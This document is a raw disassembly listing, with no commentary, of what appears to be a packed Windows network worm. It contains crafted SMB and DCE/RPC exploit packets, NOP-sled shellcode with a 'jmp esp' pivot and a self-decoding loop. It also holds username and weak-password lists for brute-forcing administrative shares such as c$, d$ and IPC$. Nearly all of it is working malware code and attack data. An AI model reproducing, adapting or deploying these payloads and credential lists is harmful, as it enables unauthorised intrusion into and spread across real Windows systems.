dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
dd 2180310h, 10016C6h, 100139Dh, 1001C55h, 1001C98h
dword_41A7A8 dd 5F5C0A0Dh, 2E2Fh ; sub_410B52+F�o
dword_41A7B0 dd 30B0005h, 10h, 48h, 0 dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41A7FC dd 3000005h, 10h, 5 dup(0)dword_41A818 dd 10005h, 2 dup(0) dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_41A860 dd 0 dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_41A894: ; DATA XREF: sub_410649+153�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 10h
loc_41A8A0: ; DATA XREF: sub_410649+E5�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_41A8AC: ; DATA XREF: sub_410649+202�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
jmp short loc_41A8C9
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_41A8B4: ; DATA XREF: sub_410649+2DB�o
jmp short near ptr word_41A8BA
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_41A8BA dw 0 ; CODE XREF: .packed:loc_41A8B4�j
; ---------------------------------------------------------------------------
loc_41A8BC: ; DATA XREF: sub_410649+330�o
jmp short near ptr word_41A8C2
; ---------------------------------------------------------------------------
loc_41A8BE: ; CODE XREF: .packed:loc_41A8AC�j
; .packed:loc_41A8DC�j
jmp short loc_41A8C4
; ---------------------------------------------------------------------------
db 2 dup(0)
word_41A8C2 dw 0 ; CODE XREF: .packed:loc_41A8BC�j
; ---------------------------------------------------------------------------
loc_41A8C4: ; CODE XREF: .packed:loc_41A8BE�j
; DATA XREF: sub_410649+385�o
jmp short near ptr loc_41A8C9+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_41A8C9: ; CODE XREF: .packed:0041A8AE�j
; .packed:loc_41A8C4�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
off_41A8CC dd offset loc_41005C ; DATA XREF: sub_410649+449�o
dd 2 dup(0)
dword_41A8D8 dd 77F33723h ; ---------------------------------------------------------------------------
loc_41A8DC: ; DATA XREF: sub_410649+286�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
dw 7FFDh
; ---------------------------------------------------------------------------
loc_41A8E0: ; DATA XREF: sub_410649+22E�o
lahf
jnz short loc_41A8FB
loc_41A8E3: ; DATA XREF: sub_410649+13D�o
add [ecx+1Ch], bl
loc_41A8E6: ; CODE XREF: .packed:loc_41A8F0�j
add [ecx], al
loc_41A8E8: ; DATA XREF: sub_410649+111�o
or ecx, [ebx]
sbb eax, [eax]
loc_41A8EC: ; DATA XREF: sub_410649+127�o
jmp short near ptr dword_41A8F4
; ---------------------------------------------------------------------------
align 10h
loc_41A8F0: ; DATA XREF: sub_410649+FB�o
jmp short loc_41A8E6
; ---------------------------------------------------------------------------
align 4
dword_41A8F4 dd 85000000h ; ---------------------------------------------------------------------------
call dword ptr [ebx+4Dh]
loc_41A8FB: ; CODE XREF: .packed:0041A8E1�j
inc edx
jb short $+2
; ---------------------------------------------------------------------------
dw 0
dd 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h, 240043h, 3F3F0000h, 3F3F3Fh, 0
dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dd offset loc_401495
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 2 dup(0)
; ---------------------------------------------------------------------------
sub sp, 71Ch
jmp esp
; ---------------------------------------------------------------------------
align 4
dd 1004600h, 7515123Ch, 751C123Ch, 42B68ABAh, 42D01E50h
dd 34000112h, 0
dd 150000h, 1B000106h, 20100h, 30C001Ch, 4002800h, 20008FFh
dd 10h, 0
dd 34EEA51Bh, 0
dd 12400h, 0
dword_41AF50 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_410B52+62�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_41AFDC dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+A2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_41B088 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+E2�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_41B168 dd 3A000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+13C�o
dd 0AB80000h, 46300800h, 0FF04h, 1000000h, 0F00h, 495C5C5Ch
dd 244350h, 3F3F3F3Fh, 3Fh
dword_41B1A8 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+179�o
dd 4DC0800h, 400800h, 0DE00FF18h, 800DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 0
dword_41B20C dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+1B9�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41B2B0 dd 66030000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+216�o
dd 3900800h, 3C1D0800h, 1C000010h, 0E0040003h, 0FFh, 2 dup(0)
dd 1C004A00h, 2004A03h, 2600h, 5C032340h, 45504950h, 5005Ch
dd 100300h, 31C0000h, 0
dd 3040000h, 0
dd 4221001Fh, 184E8h, 0
dd 10000h, 0
dd 1630000h, 0
dd 1630000h, 0
dword_41B338 dd 0 dd 0D7h, 1, 0
dd 1, 0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
align 4
dd 2 dup(0)
dword_41B35C dd 0CA040000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+348�o
dd 1C80800h, 7CC90800h, 80000010h, 0E0040004h, 0FFh, 2 dup(0)
dd 80004A00h, 2004A04h, 2600h, 5C048740h, 45504950h, 5005Ch
dd 100300h, 4800000h, 0
dd 4680000h, 0
dd 72B3001Fh, 1A381h, 0
dd 10000h, 0
dd 2150000h, 0
dd 2150000h, 0
dword_41B3E4 dd 0 dd 85h, 2, 0
dd 2, 2EBh, 85h, 2 dup(0)
dword_41B408 dd 20804h, 0 ; sub_410B52+29B�o ...
dword_41B410 dd 2080Ah, 0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_1:
unicode 0, <Windows 2000 2195>,0
aWindows20005_2:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 41ED0000h, 2686272Ch
dd 0B3A059D2h, 8800AA5Eh, 57C56Fh, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5A000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5A00FF04h, 1000800h, 2F00h, 0
dd 3F3F0000h, 3F3F3Fh, 0
dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4780800h, 400800h, 0DE00FF18h, 1000DEh, 16h, 0
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 500800h, 48000010h, 0
dd 10h, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 5940h, 50005Ch, 500049h
dd 5C0045h, 400000h, 30B0005h, 10h, 48h, 1, 10B810B8h
dd 0
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
align 10h
jmp short loc_41B84A
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B852
; ---------------------------------------------------------------------------
loc_41B84A: ; CODE XREF: .packed:0041B840�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B852: ; CODE XREF: .packed:0041B848�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 9090767Ah
nop
nop
nop
nop
nop
jmp short loc_41B8A1
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B8A1: ; CODE XREF: .packed:0041B897�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
db 8 dup(90h)
; ---------------------------------------------------------------------------
jmp short loc_41B97E
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B986
; ---------------------------------------------------------------------------
loc_41B97E: ; CODE XREF: .packed:0041B974�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B986: ; CODE XREF: .packed:0041B97C�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
jns short near ptr word_41B9F6
add [ecx], eax
jmp short loc_41B9C6
; ---------------------------------------------------------------------------
align 10h
dd 767A1567h
db 2 dup(90h)
; ---------------------------------------------------------------------------
loc_41B9C6: ; CODE XREF: .packed:0041B9BC�j
nop
nop
nop
nop
nop
jmp short loc_41B9D5
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B9D5: ; CODE XREF: .packed:0041B9CB�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 7E0h, 4, 0
db 2 dup(0)
word_41B9F6 dw 0 ; CODE XREF: .packed:0041B9B8�j
dd 0D0EC8166h, 7, 129F74h, 0
dd 127D78h, 0
; ---------------------------------------------------------------------------
pusha
jmp short loc_41BA16
; =============== S U B R O U T I N E =======================================
sub_41BA13 proc near ; CODE XREF: .packed:loc_41BA16�p
pop ebx
push ebx
retn
sub_41BA13 endp
; ---------------------------------------------------------------------------
loc_41BA16: ; CODE XREF: .packed:0041BA11�j
call sub_41BA13
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_41BA23: ; CODE XREF: .packed:0041BA4C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_41BA23
popa
add [ebx+31h], al
mov ebp, 7FC77h
add [ecx], al
inc ebx
loc_41BA5A: ; CODE XREF: .packed:0041BA5C�j
xor eax, eax
ja short loc_41BA5A
pop es
; ---------------------------------------------------------------------------
db 0
dd 4F020100h, 7E7655Bh, 0
dd 195h, 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
byte_41BB00 db 90h ; DATA XREF: sub_410F60+35�r
; sub_410F60+73�r ...
dword_41BB01 dd 0 db 9Eh, 2 dup(0)
dd 0F50000h, 0F8000000h, 0
dd 0F9h, 0FC00h, 1270000h, 2F000000h, 1, 137h, 13F00h
dd 1400000h, 41000000h, 4, 842h, 24300h, 40450000h, 46000000h
dd 10h, 2047h, 14800h, 4490000h, 4A000000h, 8, 24Bh, 404D00h
dd 104E0000h, 4F000000h, 20h, 198h, 19F00h, 5910000h, 92000000h
dd 9, 393h, 419500h, 11960000h, 97000000h, 21h, 999h, 0
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOemuser ; "oemuser"
dd offset aWwwadmin ; "wwwadmin"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-7FFFBE3Dh], cl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [ebx+eax*8+41h], ah
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [ebx+eax*8+41h], dl
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
dd offset aC ; "c$"
dd offset aD ; "d$"
; ---------------------------------------------------------------------------
fadd st(2), st
inc ecx
add al, dl
retn 41h
; ---------------------------------------------------------------------------
dd offset aDShared ; "d$\\shared"
; ---------------------------------------------------------------------------
mov eax, 0AC0041C2h
retn 41h
; ---------------------------------------------------------------------------
mov al, ds:8C0041C2h
retn 41h
; ---------------------------------------------------------------------------
dd offset aCWindowsSystem ; "c$\\windows\\system32"
; ---------------------------------------------------------------------------
push 600041C2h
retn 41h
; ---------------------------------------------------------------------------
xor dl, al
inc ecx
add [eax], ch
retn 41h
; ---------------------------------------------------------------------------
dd offset aIpc ; "IPC$"
dd 0
dd offset byte_41DE30
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
; ---------------------------------------------------------------------------
aam 0C4h
inc ecx
add al, cl
les eax, [ecx+0]
rol ah, 41h
add [eax-4BFFBE3Ch], bh
les eax, [ecx+0]
sbb al, 0C2h
inc ecx
add [eax], bl
retn 41h
; ---------------------------------------------------------------------------
adc al, 0C2h
inc ecx
add [eax], cl
retn 41h
; ---------------------------------------------------------------------------
cld
rol dword ptr [ecx+0], 0F4h
rol dword ptr [ecx+0], 0F0h
rol dword ptr [ecx+0], 0E4h
rol dword ptr [ecx+0], 0DCh
rol dword ptr [ecx+0], 0D8h
rol dword ptr [ecx+0], 0D4h
rol dword ptr [ecx+0], 0D0h
rol dword ptr [ecx+0], 0CCh
rol dword ptr [ecx+0], 0C8h
rol dword ptr [ecx+0], 0C0h
rol dword ptr [ecx+0], 0B8h
rol dword ptr [ecx+0], 0B0h
rol dword ptr [ecx+0], 0A8h
rol dword ptr [ecx+0], 9Ch
rol dword ptr [ecx+0], 90h
rol dword ptr [ecx+0], 84h
rol dword ptr [ecx+0], 7Ch
rol dword ptr [ecx+0], 70h
rol dword ptr [ecx+0], 68h
rol dword ptr [ecx+0], 60h
rol dword ptr [ecx+0], 50h
xchg eax, edx
inc ecx
add [eax-3Fh], bl
inc ecx
add [eax+44004198h], dl
xchg eax, edx
inc ecx
add [eax-3Fh], dl
inc ecx
add [eax-3Fh], cl
inc ecx
add [eax-3Fh], al
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aDemo ; "demo"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aNull ; "null"
dd offset aTemp ; "temp"
dd offset aTemp123 ; "temp123"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aSex ; "sex"
dd offset aLetmein ; "letmein"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWwwadmin ; "wwwadmin"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], bh
inc ecx
add [eax+eax*8+41h], ch
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-40h], ah
inc ecx
add [eax-40h], bl
inc ecx
add [eax-40h], dl
inc ecx
add [eax-40h], cl
inc ecx
add al, dh
rol byte ptr [ecx+0], 88h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], al
inc ecx
add [eax], bh
rol byte ptr [ecx+0], 30h
rol byte ptr [ecx+0], 28h
rol byte ptr [ecx+0], 80h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax+eax*8], bl
inc ecx
add [eax+eax*8], cl
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [eax+eax*8], al
inc ecx
add al, bh
mov edi, 0BFE80041h
inc ecx
add [ebx+eax*8+41h], ah
add ah, dl
mov edi, 0BFD00041h
inc ecx
add ah, cl
mov edi, 0BFC40041h
inc ecx
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [eax-5BFFBE41h], dh
mov edi, 0C3540041h
inc ecx
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
